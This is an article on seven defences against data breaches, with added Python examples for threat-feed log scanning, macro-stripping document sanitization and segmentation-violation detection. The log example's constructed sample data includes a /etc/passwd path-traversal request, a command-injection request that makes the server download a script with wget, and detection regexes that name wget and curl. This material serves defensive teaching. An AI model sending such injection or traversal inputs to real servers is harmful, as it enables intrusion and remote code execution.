7 Steps to Deal with a Data Breach

Sourced from CSO.

As data breaches continue to make their way into the public news cycle, individuals and organizations alike are looking for ways to protect their financial and personal information. Two things hold true about this type of threat: the cost of a data breach is very high, and an organization that has been breached once is more likely to be breached again.

The impact of a data breach can have long-term effects on both the financial and reputational state of an organization. Despite this, some still do not have the security solutions in place that are required to effectively defend modern, digital environments from data breaches.

Organizations must deploy solutions and adopt certain strategies designed to work together to protect critical data and assets from being compromised or stolen.


Here are seven steps that reduce both the likelihood and the impact of a data breach:

1. Practise Security Hygiene 

It may come as a surprise that a majority of data breaches are caused by threats that have been around for weeks, months, or, in some cases, even years. Most of the attacks being detected today target vulnerabilities for which a patch has been available for at least three years.

With this in mind, organizations should patch every device in their inventory now rather than wait until a formal patch-management process is in place, and then establish that process so the backlog does not build up again. Devices that cannot be patched or updated should be replaced, or shielded with compensating controls placed close to them, such as an intrusion prevention system (IPS) in front of the device and zero-trust network access in place of flat network reachability.

In addition to patching, security teams must ensure that these devices are properly segmented and that the network can automatically detect and quarantine a device once it is compromised.

2. Leverage Threat Intelligence

When working to stay ahead of cybercriminals, organizations should not underestimate the importance of advanced threat intelligence. While local intelligence gathered across one’s network is a critical piece of the puzzle, it alone cannot provide enough data to be truly effective.

“Threat feeds are crucial in keeping security teams up to date on the latest exploits around the globe,” says Jonathan Nguyen-Duy, VP of Global Field CISO Team at Fortinet.

“The data that is pulled from these feeds can be converted into actionable intelligence that can then be combined with local intelligence and then distributed across the security framework, resulting in maximum protection.”

3. Use Signature-based Detection Tools

Most vulnerabilities that have been or are being exploited are already known, so attacks against them follow recognizable patterns that can be detected with signatures. Signature-based detection tools let security teams scan network traffic and block attempts to exploit known vulnerabilities, provided the signature set is kept current; on their own they do not catch new or heavily obfuscated attacks, which is what the next step addresses.

“Signature-based tools are [also] a great option for complex environments that feature various IoT and other interconnected devices that cannot be updated,” explains Joe Robertson, Field CISO at Fortinet.
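To show how steps 2 and 3 fit together, here is an added example (not code from the article or from Fortinet) that converts a small threat feed into matchers and runs them over web server access log lines. The feed entries, IP addresses, log lines and rule names are all constructed for illustration, and the feed format and log format are assumptions; the point is the pipeline: feed indicators become compiled rules, the request URI is normalized (percent-decoded) before matching so an encoded traversal does not slip past a signature written for `../`, and each log line is reported with every rule it hit.

```python
import ipaddress
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed threat feed: made-up indicators in the shape a CSV/STIX feed would deliver.
THREAT_FEED = [
    {"type": "ipv4", "value": "203.0.113.7", "name": "scanner-infra"},
    {"type": "cidr", "value": "198.51.100.0/24", "name": "known-c2-range"},
    {"type": "uri-regex", "value": r"\.\./\.\./", "name": "path-traversal"},
    {"type": "uri-regex", "value": r"(?:;|\|\||&&)\s*(?:wget|curl)\s", "name": "command-injection"},
]

# Constructed access log lines in common log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.14 - - [10/Oct/2023:13:55:37 +0000] "GET /cgi-bin/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0
192.0.2.15 - - [10/Oct/2023:13:55:38 +0000] "GET /about HTTP/1.1" 200 1024
198.51.100.23 - - [10/Oct/2023:13:55:39 +0000] "GET /ping?host=1;wget%20http://203.0.113.9/x.sh HTTP/1.1" 200 20
"""

# client, ident, user, [timestamp], "METHOD URI PROTOCOL", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


@dataclass(frozen=True)
class Rule:
    name: str
    kind: str        # "ip" or "uri"
    matcher: object  # ipaddress network or compiled regex


def compile_feed(feed):
    """Convert raw feed entries into matchers: networks for address indicators,
    compiled regexes for request-URI patterns. Unknown indicator types fail loudly
    rather than being silently skipped."""
    rules = []
    for ind in feed:
        if ind["type"] in ("ipv4", "cidr"):
            rules.append(Rule(ind["name"], "ip", ipaddress.ip_network(ind["value"], strict=False)))
        elif ind["type"] == "uri-regex":
            rules.append(Rule(ind["name"], "uri", re.compile(ind["value"], re.IGNORECASE)))
        else:
            raise ValueError(f"unsupported indicator type: {ind['type']}")
    return rules


def scan_log(log_text, rules):
    """Return (line_no, client, decoded_uri, [rule names]) for every line that hits a rule.
    The URI is percent-decoded before matching so that %2e%2e/ does not slip past a
    signature written for ../ (a classic IDS evasion)."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; in production count these rather than drop them silently
        client, _ts, _method, raw_uri, _status = m.groups()
        uri = unquote(raw_uri)
        try:
            addr = ipaddress.ip_address(client)
        except ValueError:
            addr = None  # logs that resolve hostnames: no address to match on
        matched = [r.name for r in rules
                   if (r.kind == "ip" and addr is not None and addr in r.matcher)
                   or (r.kind == "uri" and r.matcher.search(uri))]
        if matched:
            hits.append((n, client, uri, matched))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, compile_feed(THREAT_FEED)):
        print(hit)
```

Running it reports lines 1, 2 and 4: the first only by source address, the second only by the decoded traversal pattern, and the fourth by both a feed range and a URI signature. That last case is the "local plus global intelligence" combination the quote above describes: the feed alone says the address is suspicious, the signature alone says the request is hostile, and together they give a high-confidence hit.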

4. Understand Behavior-based Analytics and Data Sanitization

For those threats that do not have a recognizable signature, organizations must employ advanced threat protection solutions and User and Entity Behavior Analytics (UEBA) tools. Because threat actors can learn and mimic legitimate traffic patterns to evade protection, security tools need to do more than look for low-hanging malware. They must also “conduct an in-depth inspection and analysis that focuses on patterns that can then be used to detect and diagnose malicious intent,” according to Alain Sanchez.

These systems should also be able to intervene automatically, before a malicious payload reaches a user. Data sanitization, for example with Content Disarm and Reconstruction (CDR) tools, strips active content such as macros, scripts and embedded objects from incoming files and rebuilds each file from only its safe elements, so a weaponized document is neutralized whether or not anything in it matches a signature.
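The following is an added example of the CDR idea applied to an Office Open XML document; it is not code from the article or from any CDR vendor. A .docm file is a zip package whose parts are tied together by relationship (.rels) files and declared in `[Content_Types].xml`. The sanitizer locates active-content parts two independent ways, by relationship type and by declared content type, removes them, removes every pointer to them, and re-declares the main part as a plain (non macro-enabled) document. The sample document is constructed in memory with placeholder bytes where a real VBA project and OLE object would be; the namespace and content-type strings are the standard OOXML ones.

```python
from __future__ import annotations

import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

# OOXML package namespaces and the content/relationship types that mark active content.
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
VBA_REL = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MACRO_MAIN = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
ACTIVE_RELS = {VBA_REL, OLE_REL}
ACTIVE_CTYPES = {"application/vnd.ms-office.vbaProject",
                 "application/vnd.openxmlformats-officedocument.oleObject"}


def build_sample_docm() -> bytes:
    """Constructed macro-enabled document: minimal parts plus placeholder VBA and OLE blobs.
    The blobs are not real code; only the package structure matters here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", f'''<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="{CT_NS}">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/word/document.xml" ContentType="{MACRO_MAIN}"/>
  <Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>
</Types>''')
        z.writestr("_rels/.rels", f'''<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>''')
        z.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>')
        z.writestr("word/_rels/document.xml.rels", f'''<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{VBA_REL}" Target="vbaProject.bin"/>
  <Relationship Id="rId2" Type="{OLE_REL}" Target="embeddings/oleObject1.bin"/>
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
</Relationships>''')
        z.writestr("word/styles.xml", f'<w:styles xmlns:w="{W_NS}"/>')
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder VBA project")
        z.writestr("word/embeddings/oleObject1.bin", b"\xd0\xcf\x11\xe0 placeholder OLE object")
    return buf.getvalue()


def _resolve(rels_name: str, target: str) -> str:
    """Relationship targets are relative to the source part's folder (word/_rels/x.rels -> word/)."""
    if target.startswith("/"):
        return target.lstrip("/")
    source_dir = posixpath.dirname(posixpath.dirname(rels_name))
    return posixpath.normpath(posixpath.join(source_dir, target))


def find_active_parts(package: bytes) -> set[str]:
    """Locate active-content parts by relationship type AND by declared content type,
    so a part reachable through only one of them is still caught."""
    z = zipfile.ZipFile(io.BytesIO(package))
    active = set()
    for name in z.namelist():
        if name.endswith(".rels"):
            for rel in ET.fromstring(z.read(name)).iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") in ACTIVE_RELS and rel.get("TargetMode", "Internal") != "External":
                    active.add(_resolve(name, rel.get("Target")))
    types = ET.fromstring(z.read("[Content_Types].xml"))
    defaults = {d.get("Extension").lower(): d.get("ContentType") for d in types.iter(f"{{{CT_NS}}}Default")}
    overrides = {o.get("PartName").lstrip("/"): o.get("ContentType") for o in types.iter(f"{{{CT_NS}}}Override")}
    for name in z.namelist():
        if (overrides.get(name) or defaults.get(name.rsplit(".", 1)[-1].lower())) in ACTIVE_CTYPES:
            active.add(name)
    return active


def _serialize(root: ET.Element, default_ns: str) -> bytes:
    ET.register_namespace("", default_ns)  # emit xmlns="..." rather than an ns0: prefix
    return b'<?xml version="1.0" encoding="UTF-8"?>\n' + ET.tostring(root, encoding="unicode").encode("utf-8")


def sanitize(package: bytes) -> tuple[bytes, list[str]]:
    """Rebuild the package without active parts and without any pointer to them.
    Returns the clean package and the sorted list of removed part names."""
    active = find_active_parts(package)
    src = zipfile.ZipFile(io.BytesIO(package))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            if name in active:
                continue
            data = src.read(name)
            if name == "[Content_Types].xml":
                root = ET.fromstring(data)
                for el in list(root):
                    if el.tag == f"{{{CT_NS}}}Override" and el.get("PartName").lstrip("/") in active:
                        root.remove(el)
                    elif el.get("ContentType") == MACRO_MAIN:
                        el.set("ContentType", PLAIN_MAIN)  # no macros left: declare a plain document
                data = _serialize(root, CT_NS)
            elif name.endswith(".rels"):
                root = ET.fromstring(data)
                for rel in list(root):
                    if rel.get("TargetMode", "Internal") != "External" and _resolve(name, rel.get("Target")) in active:
                        root.remove(rel)
                data = _serialize(root, REL_NS)
            dst.writestr(name, data)
    return out.getvalue(), sorted(active)


def part_names(package: bytes) -> list[str]:
    return zipfile.ZipFile(io.BytesIO(package)).namelist()


def read_part(package: bytes, name: str) -> str:
    return zipfile.ZipFile(io.BytesIO(package)).read(name).decode("utf-8")
```

Two practitioner notes. First, the output should be written with a .docx extension, since the content type no longer declares macros and Word will refuse a .docm whose main part is plain. Second, this is deliberately a whitelist of structure, not a scan of the blobs: the VBA and OLE parts are dropped because of what they are, without anyone needing to decide whether they are malicious, which is exactly why CDR complements rather than replaces signature and behavioral detection.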

5. Use Web Application Firewalls

Today’s threats are anything but traditional, and the same must be true of today’s security tools. Despite the well-known risk of web-based attacks, many organizations are not able to adequately test or harden their web applications before they are deployed.

Nguyen-Duy explains that by employing a web application firewall (WAF), “organizations can achieve a deep level of inspection of web application traffic that goes beyond what traditional NGFW technology can offer.”

6. Replace Traditional Point Security Technologies

Most traditional point security solutions operate in isolation: each sees only the traffic in front of it and never gets the full picture of the network. Given the multi-vector nature of today’s attacks, a fabric-based approach in which controls share context and respond together is critical for keeping constantly evolving network architectures protected against data breaches.

Sanchez stresses the importance of this fabric architecture, stating, “It offers benefits that are necessary in the face of a data breach, such as a single pane of glass management for visibility purposes and automated response to attacks.”

7. Implement Network Segmentation

Given how freely data and applications flow across today’s digital environments, organizations must also segment their networks to stop a threat from spreading beyond the point where it first lands. This can be achieved by deploying internal network segmentation firewalls and establishing both macro-segmentation (between zones such as users, IoT and servers) and micro-segmentation (between individual workloads) strategies.

“By doing this, security teams can create consistent policies across the network and more effectively manage and secure the movement of data and applications,” explains Robertson.

Segmentation is especially critical when large amounts of data are being collected and correlated in a single environment or across several. It puts controls in place to detect a threat that has breached one segment and is moving across the environment; without it, an attacker who gains a foothold anywhere can move end to end across the network with little to stop them.
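As an added example of the detection side of segmentation (not code from the article or from any vendor), the block below models segments as address ranges and the segmentation policy as an explicit allow list with default deny, then evaluates flow records against it. The zone names, ranges, policy entries and flow lines are all constructed for illustration. Beyond flagging single violations, it picks out hosts whose denied flows reach several other segments, which is the "threat moving across the environment" pattern the paragraph above describes rather than a one-off misconfiguration.

```python
import ipaddress
from collections import defaultdict

# Constructed segmentation model: zone name -> address range (values made up for this example).
SEGMENTS = {
    "corp-users": ipaddress.ip_network("10.10.0.0/16"),
    "iot":        ipaddress.ip_network("10.20.0.0/16"),
    "app":        ipaddress.ip_network("10.30.0.0/24"),
    "db":         ipaddress.ip_network("10.30.1.0/24"),
}

# Allowed inter-segment flows as (source zone, destination zone, destination port).
# Default deny: any cross-segment flow not listed here is a violation.
POLICY = {
    ("corp-users", "app", 443),
    ("app", "db", 5432),
    ("iot", "app", 8883),
}

# Constructed flow records (NetFlow-style export reduced to CSV): src,dst,proto,dport,bytes
SAMPLE_FLOWS = """\
10.10.4.21,10.30.0.5,tcp,443,18230
10.30.0.5,10.30.1.9,tcp,5432,90211
10.20.7.33,10.30.0.5,tcp,8883,1200
10.20.7.33,10.30.1.9,tcp,5432,640
10.10.4.21,10.10.4.22,tcp,445,30000
10.10.4.21,10.30.1.9,tcp,22,2048
10.20.7.33,10.10.4.21,tcp,445,512
"""


def zone_of(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for name, net in SEGMENTS.items():
        if addr in net:
            return name
    return "unknown"  # anything unmapped is treated as untrusted, never as allowed


def parse_flows(text: str) -> list:
    flows = []
    for line in text.splitlines():
        src, dst, proto, dport, nbytes = line.split(",")
        flows.append({"src": src, "dst": dst, "proto": proto, "dport": int(dport), "bytes": int(nbytes)})
    return flows


def evaluate(flows: list) -> tuple:
    """Split flows into policy violations and intra-segment traffic.
    Intra-segment flows never cross a segmentation firewall, so they are reported
    separately (that is what micro-segmentation on the host is for)."""
    violations, intra = [], []
    for f in flows:
        s, d = zone_of(f["src"]), zone_of(f["dst"])
        if s == d:
            intra.append(f)
        elif (s, d, f["dport"]) not in POLICY:
            violations.append({**f, "src_zone": s, "dst_zone": d})
    return violations, intra


def lateral_movement_candidates(violations: list, min_zones: int = 2) -> dict:
    """Hosts whose denied flows reach two or more foreign segments. One denied flow is
    often a misconfiguration; one host probing several segments looks like a foothold
    being used to move laterally."""
    reach = defaultdict(set)
    for v in violations:
        reach[v["src"]].add(v["dst_zone"])
    return {src: sorted(zones) for src, zones in reach.items() if len(zones) >= min_zones}


if __name__ == "__main__":
    violations, _ = evaluate(parse_flows(SAMPLE_FLOWS))
    for v in violations:
        print(f"DENY {v['src']} ({v['src_zone']}) -> {v['dst']} ({v['dst_zone']}) :{v['dport']}")
    print("lateral movement candidates:", lateral_movement_candidates(violations))
```

On the sample flows, the IoT host 10.20.7.33 is allowed to reach the app tier on its MQTT port but is seen talking to the database segment and to a user workstation on SMB, which is enough to flag it; the single SSH attempt from a user workstation to the database is reported as a violation but not as a lateral-movement candidate. The same policy table is what the segmentation firewall should enforce, so the detection logic and the enforcement configuration stay consistent, which is the "consistent policies across the network" point made in the quote above.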

The frequency and sophistication of today’s data breaches highlight the fact that security cannot be pushed to the sidelines. Defending against these threats requires proactive strategies, as noted by the cybersecurity professionals quoted above, that not only rely on security solutions but also organization-wide awareness of these risks.

By embracing a range of integrated and automated strategies that can be deployed broadly across the network, organizations can protect themselves and their customers from the spectre of modern breaches.

Edited by Luis Monzon
